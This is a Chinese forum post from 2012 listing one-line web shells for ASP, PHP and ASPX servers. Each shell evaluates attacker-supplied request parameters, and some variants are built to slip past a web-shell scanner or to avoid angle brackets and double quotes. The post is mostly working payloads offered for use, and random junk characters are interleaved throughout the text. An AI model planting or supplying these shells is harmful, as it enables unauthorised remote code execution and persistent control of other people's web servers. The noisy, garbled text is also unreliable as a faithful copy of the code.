asp一句话 <%execute(request("1"))%> 0 f* ^7 m" H3 u/ W6 |
: L9 Y, p0 J: n! [1 V$ L( U* Y
php一句话 <?php eval($_POST[1]);?> % Y* N4 n0 n% e
& ^( Z0 l3 J: e7 u, v! }' S( t7 V
aspx一句话
^; ?9 C- ?4 z5 l& z/ y- e8 }! K8 o8 ?
<script language="C#" runat="server">
1 S% K8 @+ q6 T7 B$ d( ?+ ^5 a! _- A2 [8 L3 b( \5 _; n1 A7 E
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");# O9 M$ Z; l- |& }% v
: Q+ B. p. A6 o( H</script>; x. y8 N6 @ x. J1 J' g- O) V
. u" ~ {% R% `8 p6 l9 g! ?/ P, f
可以躲过雷客图的一句话。
" T" g5 {& ` f, m* |4 S4 t. l6 |: D( Q2 E, X2 m) ^* f
<%; |1 B& K6 z. h9 S1 h ^& V/ n
+ t% c, @0 H) e8 e. y: r set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
: I5 I5 H% ?) k7 `, r+ u- p1 l0 }
9 {" h5 H8 m& P* b& ` ms.Language="VBScript"" ?: }/ w9 g v, h* z1 } E
' h* n: G5 a ~- T% W. _9 E2 j ms.AddObject "Response", Response
; x5 ?" z4 `* I* ~( k' j4 E1 f |& F- z e
ms.AddObject "request", request5 e# @# n5 ^5 i3 X, j
8 N' G. Z0 d6 h2 P7 S: d
ms.ExecuteStatement("ev"&"al(request(""1""))")
0 l$ o0 I/ S! e& g2 l3 `8 p# S4 O% G% V3 ]- D( D
%>
: L" D& B. Z6 E9 {5 N) ^8 H
3 |1 \4 D" E: d/ p+ a# z+ p 不用'<,>'的asp一句话+ d+ c. V) p/ h. \0 R
' N B6 O+ h+ G$ {1 n1 t
<script language=VBScript runat=server>execute request("1")</script>
" g, |7 @1 e" l; `, G, } B: {
" F* y" ~9 p6 |/ D( W 不用双引号的一句话。8 K' g4 [/ b! B% G5 G: P
% I1 E# b/ m" j# I
<%eval request(chr(35))%>. Y z X: e! O9 X
|
发表于 2012-9-23 14:36:09
收藏
支持
反对